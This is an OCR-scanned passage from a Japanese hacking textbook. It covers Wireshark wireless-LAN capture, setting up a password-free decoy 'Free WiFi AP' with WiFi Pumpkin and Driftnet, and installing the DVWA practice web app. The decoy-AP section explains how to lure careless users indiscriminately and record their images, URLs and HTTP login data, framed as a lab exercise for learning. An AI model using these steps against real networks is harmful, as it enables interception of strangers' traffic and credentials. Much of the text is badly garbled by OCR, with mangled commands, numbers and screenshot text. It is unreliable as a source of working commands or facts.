無線 LAN フ レー ム の キャ プチ ャ 画面 は 、 次 の よう に な り ま す ( 図 6-92)。 


*87 : DoS (Denial of Servyice) アタ ッ ク と は 、 シ ステ ム や サー ビス を 妨害 し た り 、 停 止 き させ た り 
する 攻撃 で す 。 
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+ OO) COntFOL: ず kW00O 
・ Dats (3429 yte) ーー トト ーー (IEEE 802.11e) の 情報 
昌 証 お た HE お 基 CCMP は AES を 用 いる 暗号 化 方 式 で す 。 以降 の 3 
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図 6.92 キャ プチ ャ し た 無線 LAN フレ ー ム 


* ラ ジオ タッ プ (radiotap) ヘッ ダー : 無線 に 関す る 情報 が 格納 され て いる 。 
・ ラ ジオ タッ プ : 見 や すい 形 に 加工 され て いる 。 
* 無線 LAN の IEEE 802.11 ヘ ッ ダ ー : 無線 LAN で は 最大 で 4 個 の MAC ア ドレ ス 
よー (*88)。 無線 LAN の QoS (IEEE 802.11e) の 情報 も 格納 され て い 
。 CCMP は 、AES を 使っ た 無線 LAN の 暗号 化 に 関す る 情報 で ある 
s デー タ 部 分 : 無線 LAN で 運ば れる デー タ 。 暗号 化 さ れ て いる 。 


⑧) カ ラム を 追加 する 
監視 し て いる チャ ネル が わか りや すい よう に 、 チ ャ ネル 番号 を 表示 する カラ ム 
を 追加 し ます ( 図 6-93) 。 


*88 :2 つ の AP を 介し て 通信 する と 、| 送信 元 端末 一 AP1 一 (Ethernet) 一 AP2 一 宛先 端末 ] と い 
う 経路 で 通信 し ます 。 つ まり 、 合計 4 つの MAC ア ドレ ス が 必要 に な り ま す 。 
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図 6.93 カラ ム を 追加 する 
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カラ ム 名 が Channel の まま で は 幅 を 取り すぎ る の で 、 右 クリ ッ ク し て 「[Edit 
Column| を 選び 、 カ ラム 名 を "CH' に 変更 し ます ( 図 6-94)。 


Time Destmaton Protncol Lenqth Channet . こ _Infp - 
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Header 『evls1ion: @ 
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Header lerngth: 29 
Frcscnt flans 
KAC 上 ュ mmBstamp: 155535869626 
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Chnnrye.1 f」An ロ 3 < ご た で 1 し 
ALnLemma: 昌 

r RX flaqs: 9x6696 
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[Data Rate: 72.2 MD/S] 
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PFHY typg: 8B2.31n [7] 
NMCS 1ndox: 了 
Bandwidth: 26 由 Hz (8] 
Short GLI: True 
Data rate: 72.2 Mb/s 
Channel: 11 


図 6.94 カラ ム 名 を 変更 する 


9 関係 な い SSID を 表示 し な いよ うに する 


ECI COMUIYi 

Resize To Contents 
則 Resob 
| No. 
ly| TITVG 
<| SOU「C@ 
y| Destination 
Protocol 


ll Length 
| Channei 








無線 LAN の 通信 は か な り パ ケッ ト が 飛び 交 い ます 。 同一 チャ ネル で あれ ばば 、 
ター ゲッ ト AP 以外 の パケ ッ ト も 取得 され ます 。 例え ば 、| wlan.ssid == LAB3」 
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と いう 表示 フィ ル タ を 設定 する こと で 、 関 係 な い SSID を 表示 し な いよ うな フィ ル 
タ を 適用 で きま す 。 他 に も 次 の よう な 表示 フィ ル タ が 有効 で す 。 


wlan.bssid == 99:91 :8E : B9 : 8D : 98 
wlan_radio . channel == 
wlan .addr == AA:BB:CC :99 : 11 : 22 


再送 の 有無 を 調査 する 


無線 LAN の 電波 に 問題 が ある と 、 フ レー ム の 再送 が 発生 する こと が あり ます 。 
IEEE 80211 の MAC ヘ ッ ダ ー か ら 再 送 の 有無 が わか り ま す 。MAC ヘ ッ ダ ー の フ 
レー ム 制 御 部 の 再送 フラ グ が あり 、1 に な っ て いれ ば 再送 パケ ッ ト を 意味 し ます 。 


Managed モー ド 
Wireshark の 画面 に MAC ヘ ッ ダ ー は 表示 され ませ ん 。 そ の た め 、 再送 の 有無 を 
調べ られ ませ ん 。 


Monitor モー ド 


Wireshark の 画面 に MAC ヘ ッ ダ ー が 表示 され ます 。 次 の 表示 フィ ル タ で 再送 パ 
ケッ ト を 絞り 込め ます 。 


wlan .†c .retry == 
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協 Windows で の 無線 LAN の パケ ッ ト キ ャ プチ ャ 
で Managed モー ド 


①) キ ャ プチ ャ を 開始 する 

Wireshark を 起動 し ます 。 メ ニュ ー の 「 キ ャ プチ ャ |」 > |「 オ プシ ョ ン 」 を 選び ま 
す 。「 キ ャ プチ ャ イン ター フェ ー ス 」 画面 が 表示 され ます ( 図 6-95)。 無 株 LAN に 
接続 し て いる イン ター フェ ー ス の 名 前 を 選び ます 。 トラフィック の 線 の 動き か ら 、 
通信 の 有無 を 確認 で きま す 。 通常 、」 ワ イヤ レス ネッ トワ ー ク 接続 」 を 選び (*89)、 
[開始 ] ボタ ン を 押す と 、 キ ャ プチ ャ が 開始 され ます 。 


信 Miechark キャ プ キ ャ イソ ター フェ ー ス 


入力 出力 オラ フシ ョ ッ 








イツ ター ブ ェ ー ス : リン ツク 居 ハ ッ ダ プロス ォ Y ス オブ チャ パッ プ ァ [メガ /( モニ タモ ー ド キャプ チャ フィ イル タ 
> Bluetooth ネッ トリ ー ク 証 Eihernet 
rhermnet 
RE EWhernet 
Yi Host-Only Netwok 2 enernet 
USBPcsp1 USBPcsp 
USPcap: USBPcap 
USBPcap} USBPcasp ーー 
Cisco remote caPture RemotecaPture dePeruGcrnt DLT 
RsndGen packet geriesetor Gcncrator dependert DLT 一 
SSH remo4e caoture RewmotecaDtJre deperwOert DLT - 
UUDP Listener rcrnote <apture Eported PDU5 ーー 


トレ | すべ て の イン ター フェ ー2 に お いて づ ロ AFw う モー ド を 20 ヒ し ます 
近所 し た イン ムー フェ ー ス キャ フチ ャ フィ ル 9. | 








[的 6 | 幸多 | AM2 | 





図 6.95 「 キ ャ プチ ャ イン ター フェ ー ス 」 画面 


な お 、 モ ニタ ー モ ー ド の 列 が あり ます が 、 チ ェ ッ ク で きま せん 。 つ まり 、 そ の 
掴 線 LAN カ ー ド は Windows 上 で Monitor モー ド に で き な い こと を 意味 し ます 。 


(② キャ プチ ャ し た 内 容 を 確認 する 
Protocol 列 を 見 る と 、TCP や TLSvy1 と いっ た 馴染 み の あ る プロ トコ ル が 表示 さ 


*89 : Windows 7 の 場合 、「 Microsoft Virtual WiFi Minjport Adapter」 が イン スト ー ル され て いる 
こと が あり ます 。 す る と 、Wireshark の |Capture Interfaces」 画面 で 、 こ れ に 対応 する イン ター 
フェ ー ス 名 が 表示 され ます 。 これ を 選ん で も キャ プチ ャ で きる パケ ッ ト は 通常 あり ませ ん 。 
Traffic の 線 の 動き を 見 て 、 通 信 し て いる イン ター フェ ー ス を 選び ます 。 
https//supportmicrosoft.com/ja-jp/help/978072 
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図 6.96 Managed モ ー ド で の キャ プチ ャ 画面 


介 Monitor モー ド 


AirPcap NX ( 図 6.97) を 用 いた パケ ッ ト キ ャ プチ ャ を 紹介 し ます 。 


NrPcapNx 


www / 





図 6-97 AirPcap NX の 外観 
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①Wireshark の オプ ショ ン 画 面 を 確認 する 

Wireshark を 起動 し ます 。 メ ニュ ー の 「Capture」 > 「Options」 を 選び ます 。 
|Capture Interfaces」 画面 が 表示 され ます 。|AirPcap USB wireless capture 
adapter」 と 表示 され て いる イン ター フェ ー ス が あり ます 。Monitor モー ド を 有効 
に する 項目 が あり ませ ん が 、[Link-layer Header」 列 が 「802.11 plus radiotap 
headerl と な っ て お り 、 こ の まま [Startl ボタ ン で キャ プチ ャ を 開始 すれ ば 
Monitor モー ド に な り ま す ( 図 6-98) 。 





Link-layer Header Promiscucx Snapler Bufer(MB) Caphure Fiter 
802.11 plus rediotap hegder reped defeult 2 

ト Bluetooth ネッ トワ ー の 技 欠 eabed 

: NDCap LoOPoeck ん ね er igbled 

b VirtuglBox Host-Omly Network ertepied 

を フイ ヤレ ス ネッ トブ プー ク 扶 鏡 ぐず obled 

b ワイ ヤ ゼ レス ネット プー ク 援 技 3 eriabled 

ト VirtuglBox Poet-Omly Network き 2 で iebpled 








Mb pom We 0 ll nir 


Caetre 「ier loe slaoled ntar1acee: | 目 |Eltet s ceptae li … Conpe BPFs 








し 。 0 





6-98 「Capture Interfaces」 画面 


(② ツ ー ル バー を 表示 する 
メニ ュー の 「[View」 > 「Wireless Toolbar」 を 選び 、 無線 LAN の ツー ル バ ー を 
表示 し ます 。 


3⑬ パ ケッ ト を 選択 する 
Protocol が 「802.11] の パケ ッ ト を 選択 する と 、 ラ ジオ タッ プ ヘ ッ ダ ー、 ラ ジオ 
タッ プ 情 報 、IEEE 80211 フ レー ム (MAC フ レー ム ) が 表示 され ます ( 図 6-99)。 
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図 6-99 802.11 パケ ッ ト の 内 容 


④) チ ャ ネル を 指定 し て キャ プチ ャ する 

Channel で 指定 し た チャ ネル の パケ ッ ト を キャ プチ ャ で きま す 。 AirPcap NX は 
2.4GHz 演 と 5GHz 党 に 対応 し て いる た め 、 無 線 LAN の ツー ル バ ー の Channel で 
5GHz 常 の チャ ネル も 指定 で きる こと を 確認 で きま す ( 図 6-100) 。 


794/ 15 .345938 
7948 15.345939 





> Frame 7948: 58 bytes on 10 直 に 2 
> Radiotap Header vg9, Leng As 


図 6-100 指定 で きる チャ ネル 
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功 WiFi Pumpkin に よる お と り AP の 設置 

これ まで は 、 既存 の WiFi ネッ トワ ー ク を 掌握 し て 情報 を 集め る と いう アプ ロー 
ナ た は が か がり で し な た な 。 選 匠 編 まっ な く 瑞 な ププ ロー テ と た し て 。 お と の AP を 計 本 し 
て 、 罠 に か か る の を 待ち 受け る と いう 方 法 が あり ます 。 特定 の ユー ザー を 狙う こ 
と は 困難 で す が 、 逆 に セキ ュ リ ティ 意識 が 低い ユー ザー を 和 無 差 別に 攻撃 で きま す 。 

お と り AP を 立ち 上 げ る 方 法 は 色々 あり ます が 、 こ こ で は WiFi Pumpkin と いう 
ツー ル を 使い ます ("90)。GUI な の で 直感 的 に 操作 で き 、 単 に AP 化す る だ け で な 
く 情報 収集 を 支援 する 機能 も 十分 に 備わっ て いま す 。 


①WiFi Pumpkin を イン スト ー ル する 
Kali に WiFi Pumpkin を イン スト ー ル し ます 。 た だ し 、 イ ンス トー ル に は 若干 時 
間 が か か り ま す 。 


OO 人 Ka11 :<# g1t Clone httDps : / / github . com/P9cL4bs/MiFi-Pumpkin . g1 ト 
Oot 人 Ka11:<# Cd MiF1-PumpK1in/ 


PootQKa11 :>/M1F1-PumDkin# ./1nstaller.sh --instal11 


②)WiFi Pumpkin を 起動 する 
イィ インストール が 完了 し た ら 、 次 の よう に 入力 し て WiFi Pumpkin を 起動 し ます 。 
する と 、Wifi Pumpkin の 画面 が 表示 され ます ( 図 6-101) 。 


Foott 個 ka11:<# w ユ す 1 ユ -DumDkin 


*90 : https//githubcom/POcL4bs/ WiEiLPumpkin 
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WIFI-Pumpkin v0.8.5 





6-101 WiFi Pumpkin 


3 AP の 基本 設定 を 行う 
左 ペ イン か ら |Settings」 を 選び 、AP の 基本 設定 を 行い ます 。 こ こ で は 、 次 の 


よう に 設定 し ます ( 図 6-102)。 


* SSID に は Free WiFi AP を 入力 する 。 謗 いい 込 みや すい 名 前 に する と 効果 的 と 


ゆい 


* | Enable Wireless Security」 の チェ ッ ク を 外し 、 わ ざと オー プン 状態 (パス ワー 
ド な し ) に する 。 


s | Network Adapter」 に wlan0 を 指定 する (wlan0 は Managed モー ド の まま )。 
s DHCP_-Settings の |Class Ranges」 は |Class-B-Address」 に する 。 


| Class-A-Address」( デ フォ ルト ) に する と 、 すでに Kali が 使用 し て いる IP アド 
レス と 被る 殖 れ が あり ます 。 被っ て し まう と 、AP に 接続 し た 端末 が イン ター ネッ 
、 に アク セス で きま せん 。 こ こ で は 、 ク ラス B を 指定 する こと で 、AP に 接続 し た 
端 本 は 、172.16.0.100 一 172.16.0.150 の 範 囲 で 動 的 に IP アド レス が 割り 当て られ ま 


3 


J 
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WiFLPumpkin yO.8.5 





6-102 「Settings」 画面 


4 AP を 稼働 させ る 


IStart」 ボタ ン を 押し ます 。 数 秒 待 つと 、 下 の |Status-AP」 が ON に な り ま す 


5 Driftnet を 起動 する 
メニ ュー の |Tools」 > |Active DriftNet」 を 選択 する と 、Driftnet が 起動 し ま 
す 。Driftnet は キャ プチ ャ し た デー タ か ら 画 像 (peg フ ァイル と gif フ ァイル ) を 


押出 し て 、 画 面 に 次 々 と 表示 する ツー ル で す (*91) 


w 


6 |Stations」 を 確認 する 
左 ペ イン の [Stations」 を 選び ます 。 こ こ に は AP に 接続 し て きた 時 間 、 端 末 の 


MAC ア ドレ ス が 表示 され ます 。 


91 : https//github.com/deiv/driftnet 
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7, おとり AP に 接続 する 

実験 用 端末 (ここ で は スマ ホ ) で 、 こ の AP に 接続 し ます 。 す る と 、WiHi 
Pumpkin の 右 下 に ある Client の 数 が 増え 、Stations 画 面 に も 端末 の 情報 が 表示 さ 
れ ま す 。 


8 ) キ ャ フチ ャ し た 画像 を 確認 する 

端末 で プラ ウザ を 起動 し て 、 イ ンタ ーネット を 巡回 し ます ("92)。 す る と 、 
Driftnet の 画面 に 画像 が 次 々 と 表示 され ます 。 実用 性 は あま りあ り ま せん が 、 派手 
な 動き な の で ハッ キン グ の アビ ピール に よく 便 わ れ ま す . 

WiFi-Pumpkin の 左 ペ イン の |Images-Cap」 を 選択 する と 、 キ ャ プチ ャ し た 画像 
が 一 覧 で 表示 され ます 。 こ ちら の 方 が Driftnet の 画面 より 見 や すい と いえ ます ( 図 
6-103) 。 


還 


(3 の 下 ヨ ーー diftmet @@ 9 
Images-Cap の 画面 





WiF-P mmPKIn YU. 


暗号 技術 


図 6-103 Images-Cap と Driftnet 


ゅ の ず NrY) > na = ます 1 と ま 、/TN v ま 人 。 「 * ー ナ ーー 二 v pr 間 * 介 2 
92 : AP に 接続 し た の に イン ター ネッ ト に アク セス で き な い 場合 は 、Kalh7 に ンタ ーネット に 
アク セス で きる こと を 確認 し て くだ さい アク セス で きる の で あれ ば 、IP ア ド が 披 っ て いな 


いこ と る 確認 し ます 。 WiEiPumpkn の 左下 の [Connectiion」 の と ころ に ko 1 が 表示 され て 
お り 、 こ の ethl を 通じ て イン ター ネッ ト に アク セス で きる こと を 確認 し ます 。 ethl が NAT や ブフ プ 


リッ ジア ダブ ター で あれ ば 問題 あり ませ ん が 、 ホ スト オン リー アダ プター だ と うま くい きま せん 





590 | 第 2 部 | ハッ キン グ を 体験 する 


| Active-Monitor」 に は 、 ア クセ モス し た URL と HTTP の 認証 デー タ が 記録 され ま 
す (HTTPS で は な い )。 


9⑨ AP を 停止 する 
AP を 停止 し た い 場 合 に は 、[Stop] ボタ ン を 押し ます 。 
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ハッ キン グ を 体験 する 
7 ェ 


学習 用 アプ リ に よる 
Web アプ リ の 
ハッ キン グ 






はじめ に 


Gy 導 <qF た コア AG タウ) の kd 19xG に に を さき 7/ 生 > さ wcdF コピ 
Web ア プリ ケー ショ ン に 対す る 簡単 な ハッ キン グ に つい て 解説 し ます 実際 
に 攻撃 を 体験 し て も ら う た め に 、 DVWA や bWAPP bee-box と いつ た 学習 用 
送 に 特 化し た アプ リ を 用 いま す 。 具体 的 な 攻撃 手法 を 理解 し た うえ で 、Web 
アプ リケーション に 関す る セキ ュ リ ティ の 文献 を 読む と 、 より 理解 が 進 び はず 
re だ 


7-1 | DVWA で Web ア プリ の ハッ キン グ を 体験 する 





DVWA (Damn Vulnerable Web App) は 脆弱 性 の ある Web アプ リ の 1 つ で す 。 
PHP、MySQL で 構築 され て いま す 。 主 に ハッ キン グ の 練習 用 に 使わ れ ま す 。 

Metasploitable 2 に は DVWA が 佑 入 され て いま す 。 し か し 、 Metasploitable 自体 
が メン テ ナ ン ス され て いな い の で 、 それに 含ま れる DVWA も 喜 い バ ー ジ ョ ン に な 
り ま す 。 本 書 で は 、 単 独 で 提供 され て いる DVWA を 導入 する こと に し ます 。 


協 DVWA の イン スト ー ル 
DVWA を イン スト ー ル する に は 、 次 の 手順 を 実行 し ます 。 


わ DVWA を タウ ン ロ ー ド する 
Kalii で 下記 の サイ ト に アク セス し て 、'DVWA-master.ziDp ファ イル を ダウ ン 
Fm まし ます だ 有 U。 


ギド クー チ 人 トト デー ヤヤ で ヤー ヤード ーー ドド 人 デ 著 
DVWA - Damn Vulnerable Web Application 


http:// wwwidywa.coJuk 
上 ノ 


2) フ ァイル を 解凍 する 
Firefox か ら ダ ウン ロー ド し た 場合 は 、/tmp/mozilla_root00 ディ レク トリ ( 
プ テ イ ル が 邊 在 し ます 。 これ を ツ rooe ディ シク トリ に 多 動 し て 、 培 束 し ます 。 


Foot 合 ka1l1:< CD / て mp/moz111a root9/DVMA-master .z1D /root 
FootQkKal1:<# unz1iD DVMA-master . ziDp 


3 ファ イル を 移動 し て 権限 を 変え る 
Web サ ー バ ー と し て 公開 する た め 、 フ ァイル を 移動 し ます 。 その後 、 権 限 を 変 
えま す 。 


1 : GitHub か ら は 様々 な 形式 で ダウ ン ロ ー ド で きま す 
https//github.com/ethicalhack3r/DVWA 
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config フ ァイル が 正しい ファ イル 名 に な っ て いな い の で 、 修 正 し ま す 。 





④Apache と MySQL を 起動 し て アク セス で きる よう に する 
Apache と MySQL (*2) を 起動 し て 、 ア クセ ス で きる よう に し ます 。 





⑤DVWA に アク セス する 

Kali で Firefox を 起動 し て 、http://localhost/DVWA-master/loginphp に アク セ 
ス し ます ("3)。 ま だ DVWA の デー タベース (DB) を 登録 し て いな い の で 、 自 動 
的 に "setup.php' に 転送 きれ ます 。 こ の 「Database Setup」 画面 か ら 、 デ ー タ ベー 
ス を 生成 する わけ で す が 、 ま だ で きま せん ( 図 7-1)。 


2 : 実体 は MariaDB で す 。 MariaDB は MySQL か ら 派 生 し て 登場 し た シス テム で あり 、MySQL と 
同じ コマ ン ド を 使え ます 。 


3: プラ ウザ で アク セス し た と き に 、"DVWA System error - config fle not found. Copy config/ 
configiinc.php.dist to config/config.inc.php and configure to your environment'" と いう エラ ー 
メッ セー ジ が 表示 され た と き は 、"configiincphp" ファ イル が 存在 し な いこ と を 意味 し ます 。 
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を 〇 ①|localhosUDVVWUA-master/setup Ph こ " 目 へ Scarch 立 自 ル 合 5 
Most Visited マ 馬 Offensie Security Kall Linux WMKali Docs Kali Tools Explolt-DB 功 Alrcrack-nq MKall Forums 


Database Setub ヽ 


CIlcK ori lo Cromio / RosSgl Dalakswse buOr bolOuw IO CfealG O( IOSgI YOU「 GSRIaDasd. 
YOU EE GII CfIOT ISKE SUWE YOU IGG [HE COWTGCT UGCI CTGOCTIGIS In varmmwhlimUDVWA_-maSiteffCOn 
confid.InC.DhD 








lf the dalaDa5o liGady GKIStS、 It will be cloarod and (ho dala vill be reset 
YO0u Cf SO USG hIS IO GSqt he admlmsalOf CrOOGaIS [amin PRASSWOfd") al af SE 


Setup Check 


OpeialiQ 5Yslem: "IX 
BackKorid dalabas e. MyS0L 
PHP ValSIOI に 了 .2. 和 1 


Wieb Sevei SERVER_NAME. localhost 


PH TunCtion SDay eriOfS・ Dtsabled 
PHP funcCtinn safe Imode: lsahlc ロ 

ビ PHP function 弄 Ow um inClude: Dsabled 
PH functon alow um fopen: ヒ nahle ロ 
PHP 1urncUOn agIC_dUOteS_OPC: Di sabled 
PHP module gt Missing 

PHP module hySd- ISA le0 

PHP modulg KO myS IS1alled 


MySOL usermame' root 
MySOL swSSuiord: "や "ee 
MySOL datahase dvwwa 
MySOL host- 127.0.0.1 





図 7-1 「Database Setup」 画面 


6 MySQL か ら ア カウ ント を 登録 する 
MySQL に 接続 し て 、DB 接 続 用 の アカ ウン ト (ID は 'ipusiron'、 パ スワ ー ド は 
password ) を 登録 し ます 。 


l 


Poot 仙 Ka11 :>/DOown1oads# SePVice mysq1 start 

Poot 仙 ka11 :>/Downloads# mySsq1 -u FOOt -Dp 

Enter password: 

Melcome to the MariaDB monitor. Commands end with : or \g. 
Your MariaDB connection 1d is 43 

Server Version: 19.1.29-MariaDB-6 Debian buil1dd-unstable 


Copyright (c) 2999, 2917, Oracle, MariaDB Corporation Ab and others. 
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Type "help:j' or '"\h' for help. Type '\c' to clear the current .」 
1input statement . 





MariaDB [(none)]> use mysq1: mysq1 デ ー タ ベー ス に 変え る 。 
Reading table information for completion of table and column nameS 
You can turn off this feature to get a quicker startup with -A 


Database changed 
MariaDB [mysq1]> GRANT ALL PRITVILEGES ON *.* TO 
"1puSiron" 伺 '1ocalhost' TDENTIFTED BY "password': 

"ipusiron" と "password" の 部 分 は 好み の 文字 列 を 指定 する 。 





Query OK, 9 rows affected (9.99 Sec) 


MariaDB [mysq1]> Ctr1-C -- exit! [Ctr1] 十 [c] キ ー を 押し て 終了 する 。 


Aborted 
Foot 人 MKa11 :>/Down1oads# Service mysq] restart 


MySQL に 接続 で きる よう に する 
Config.incphpD ファ イル を 編集 し て 、MySQL に 接続 で きる よう に し ます 。 


root 細 ka11: 昔 vV1 /var/www/htm1/DVMA-master/confT1g/confT1g . 1nc . php 


"config.1nc .php" フ ァイル (編集 前 ) 


$ DVMA[ "db server' ] = "127.9.9.1': 
$ DVMA[ "db_database′ ] = "dvwa': 
$ DVMA[ "db user′] 一 に いっ 【 2 


$ DVMA[ "db _password′ ] = 'p@⑳sswOrd'・ 
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"config.1nc.php" フ ァイル (編集 後 ) 


$ DVMA[ "db server' ] の が 0 に 0 に 
$ DVMA[ "db_database' ] = "dvwa': 

$ DVMA[ 'db_user' ] = "1DuS1POn': 
$ DVMA[ "db_password′ ] = "password'・ 


(8 DVWA の デー タベース を 作成 する 
| Database Setup」 画面 に て 、 [Create / Reset Databasel ボタ ン を 押し ます 。 ボ 
タン の 下 に 、 図 7.2 の よう な メッ セー ジ が 出れ ば 成功 で す 。 


| Creaxe , Reset Datsbase 


Detabase has been created. 
useirs'table was Created. 
Dewta inswited IO usmWs tabie. 


ugStbDOOK taDie Was Ciewaked. 
Duta inseftod IO dueStDOOk "tato- 


BackuD IO CO の COmfid.IrK DD.bak 
atomaiicnlly CE 


| SetulD SuccesSful 





Please lol 





図 /.2 DVWA の デー タベース を 作成 し 終え た 


9⑨)DVWA の イン スト ー ル が 正常 に 完了 し た か を 確認 する 

DVWA の イン スト ー ル が うま くい っ た か どう か を 確認 し ます 。login ペー ジ に 
移動 し て 、Username に "admin"、Password に "password'" を 入力 し て ログ イン し 
ます (これ が デフ ォ ル ト パ ス ワー ド )。 す る と 、 Welcome to Damn Vulnerable 
Web Applicationl と いう メッ セー ジ が ある ペー ジ が 表示 され ます ( 図 7.3)。 こ こ 
が DVWA の ホー ム 画 面 に な り ま す 。 以 上 で 、DVWA の イン スト ー ル が 完了 し ま 
じ た 。 





598 | 第 2 部 | ハッ キン グ を 体験 する 


Welcome to Damn Vulnerable Web Application! 


Dmmnmn yurmmb Vinb Ahncaim IDVVMA) Is a PHPWySOL we も amWCaiem 1hai np Grmm Yuinhrrale Ip 
OM ODN FI OOE CUIE げ POIGS3NCPuds DO Neel 1 SS AFI3 1OD Ia iCGOEM ww を dp ww お 
OOvttDWY パ bitY Unrwtmm1 (PFIOCWW0O パ Of IOCUIWNO WOD DIDOTW WW 10 9 ONI ntu20ml5 る It 
wm ahOU WND UaHOWT SNCMIE WI COUTIONqG CIGS NODT NTMWOTTWWIW 


TNW af COW DPWUI G 6 PUCN ove oi ie hodit Co We も WiimmwrfablllUes、 nih wwgtous luvwts od 
の 電 cwltfy wWh nnineit itiorwnn3 ninfdc で 


General InstructiOons 


| (の DIPNM HHCW ImY APPMOKCh PCW に 村 NW By WKP IOUO WWiY IOGOJN ir Aa Net kw oi 
DWCIPO WW ITOOUI IPI WKPO UD 0O IhOCh IPm Pe mv hwy て an bott COW OTDD Im mm omw 1 
le EE TK (CI DO COTTDNNe a ION mWWmwWwlt Uies IOU1 ml UN Mr 「iimW JCCesiuD Ga お tod 
FDG 5 bm 35 he PD つも COUMO by UI II WNWCUEFT VMPmti 中 HI げ 


Pinam で rm mf JIT bo Gocuimemehd nmd wm3ocumemeed vwimerablimty wfh Pf SOPwmre ThHs ie 
IDT 和 5OFMM YO HG GHCOUFAOR IO 1 ad SCOMWF AS am IE az BC 


WW HO WUOGG a WNb Ca FibWMICWIAF PPDO WPCH CH DO TMR ば 7 KEN 19 fuI1 
IhCimsc im dcuhy ThH5 wWI Onnerait howr ar JC IPC 0 muUty mr biOck < で WT FC に ID 
ACEUOPN_ WOOW、 INNIO ANM 35O0 VMNOL5 所 ieHNOK al DVDPG Wi NO GE0CHOS (wsO GS で Ca DO SN AS 
で eiWftiiOfi of PO AOMJWWCn) (mft ザ げ 





Th で 5 nhep DUinn al lm bntWinrTi OW each PP With IDWG YO DO Yeww HI る DS5 Tor PE VUnmeW 
TPW fPW MO NOMIKYNMI ITUN NF TUTRM DNCNOPPWPMJ WW WTNGN MEWW NO IN SCUIEV の 0 





WARNINGI 


図 /.3 DVWA の ホー ム 画 面 


Edge で の localhost ア クセ ス 


DVWA の ペー ジ に は 、 ホ スト オン リー ネッ トワ ー ク 内 の 端末 か ら も アク セス で 
きま す 。 例え ば 、Kali と は 別 の 端末 で プラ ウザ を 起動 し て 、 http://10.0.02/DVWA- 
master/ に アク セス で きる こと を 確認 し て くだ さい 。 

た だ し 、 Microsoft Edge の 場合 、 こ の URL に アク セス し て も エラ ー に な り ま す 。 
ルー プ バ ッ ク の 接続 処理 が 厳し く 制 限 さ れ て いる た めで す 。 最も 簡単 な 解決 方 法 
は 、 別 の プラ ウザ を 用 いる こと で す 。 臣 で な ら ア クセ モス で きま す ( 図 734) 。 


向 | 貴 Cmtrewdh ihw poe 


C ) ご の ペー ジ を 表示 で きま せん 


の 計 仙 亡 活 
さ 
。 Web アド レス ザ 正 し し こと を 確 婦 し て くだ さい 
htD//I0UQ0 2 


* 委 InO で UID/10002" を 核 人 村 し て くだ さい 


・ パー ジ を 是 条 の ① 居 電 に 凌 新 


Le1aIis 


IhG w で bs COuKG nat be found Lsgn 
ET ま NFPSIRRCF NTT OUW 守 ) 


NITE ココ コー 





図 7/-4 Edge と IE か ら の アク セス の 差異 
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し か し な が ら 、Microsoft は 今後 外 か ら Edge に 移行 し よう と 考え て いま す 。 そ 
こ で 、Edge を 使っ た 場合 の 回 避 方 法 に つい て も 解説 し て お きま す 。 

基本 的 な 方 法 と し て 、Edge の 設定 を 変更 する と いう アプ ロー チ が あり ます 。 
Edge の アド レス 欄 に |「aboutflags] と 入力 する と 、「 開発 者 向け 設定 」 画面 に な り 
ます 。 こ こ に ある 「 よ く あ る 質問 ] の リン ク を 押す と 、 回 避 方 法 を 確認 で きま す 
( 図 7.5) 。 


(りり res/edgehtmldl 和 aqs htm 


すべ て の フラ セッ ト 
ライ 7 


に アク セス で きる よう に な り ま す 。 ローカル 
- 環境 に Web サー パー を 立ち 上 げた 場合 に こ 
開発 者 向け 設定 の 設定 に し ます 。 


| ] コン テキ スト メニ ュー に "ソー ス の 表示 * と " 要 穴 の 栓 
童 を 表示 する 


ン | Microsoft 互 性 一 苑 を 使用 する 


| ン | エン ター プラ イズ モー ド サイ ト 一 覧 を 使用 する 


ン | localhost ルー プ バ ッ ク を 許可 する (デバ イス が 人 危険 に さ 
ら さ れる 可能 性 が あり ます )。 カ カス タム ルー プ バ ッ ク ホホ 
スト ファ イル マッ ピン グ や イン トラ ネッ ト サイ ト か ら 
の 要求 な どの 一 表 の シナ リオ で は 、 追 吉 の 構成 が め 屋 
こ な る 場合 が ます 。 ぅ ぉ こつ いて は 、 よ く あ る ご ーー W ー 
た みお RM 是 向 Mem 放 こ の リン から 詳細 を 知る 
ーー こと が で きま す 。 
| | Adobe Flash Player に ロー カル ホス ト ルー プ バ ッ ク を 
許可 する (デバ イス が 重 馬 に さら され る 可能 性 が あり ま 
す ) 


| | 鉱 張 様 能 の 開発 者 向け 本 能 を 有効 に する (これ に より デ 
バイ ス が 危 験 に さら され る 可能 性 が あり ます ) 


| Web ペー ジ に 無情 限 の メモ リ 使用 を 許可 する (デバ イ 
ス 全 体 の パフ ォ ー マ ンス に 影響 する 可能 性 び が あり ます ) 





図 7-5 Edge の 「 開 発 者 向け 設定 ] 画面 


ここ で は 、 別 の 方 法 と し て 、VirtualBox の ポー ト フ ォ ワ ー デ ィング 機能 を 用 い 
ます ( 図 7-6)。Kali の 仮想 マシ ン の 設定 画面 を 開き 、 仮 想 LAN ア ダ プ ター の 
[NAT」 の [ポー ト フ ォ ワ ー デ ィング ] ボタ ン を 押し ます 。「+」 アイ コン か ら ル ー 
ル を 追加 で きま す 。 設定 内 容 は 図 76 の よう に し ます 。 こう する こと で 、 ホ スト OS 
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か ら localhost に 対す る ボート 31337 (4) へ の アク モス が 、 ゲ スト OS (ここ で は 
Kai) の ボ ポート 80 に 転送 され ます 。 後 は [OK] ボタ ン で 設定 を 反映 させ ます 。 








計 Kah-Linux-2018&2(64E ain - 訟 定 
| ネッ トリ ー カ | 
ア ケ ブ ター 1 | アダ ゴウ ゥ ー2 アフ ター3 | j 導 プター 
ャ ッ ト リ ロー ロッ ラプ ター を 医 和 [上 IE: 
3 の 当り NAT マ 
Wi【h Pr 
マ 責 婦 [Di 
7S22-R イ バ T 昌和 EEHIEE 2 
今 fh Z0MfeAt-I 
MC アド レス [ 関 


a 記 ー ェ フォ ル ダ - 


ュー ザー イン ター フェ ー ス 


①NAT の [ポー ト フ ォ ワ ー デ ィ 
ング ] ボタ ン を 押し ます 。 








_Tee 
②「 十 ]」 アイ コン か ら 、 
』 ルー ル を 追加 し ます 。 


③ ル ー ル を 追加 し ます 。 ホス ト OS の localhost に 対す る 
ol EE に だ メリ アメ アム エア 8/ ア は 9 軍 hhccdF・ 


Kall) の ポー ト 80 に 転送 され ます 。 





ww セル 


図 7.6 ポー ト フ ォ ワ ー デ ィング の 設定 


この 状態 で 、Edge に http://10.0.0.2:31337/DVWA-master/ と 人 力 す る と 、 
DVWA の 認証 画面 に アク セス で きま す ( 図 7-7)。 


*4:Leet 表記 (英語 閉 に お ける イン ター ネッ ト で の 表記 法 ) を 用 いる と 、"elite" は "31337" に な り 
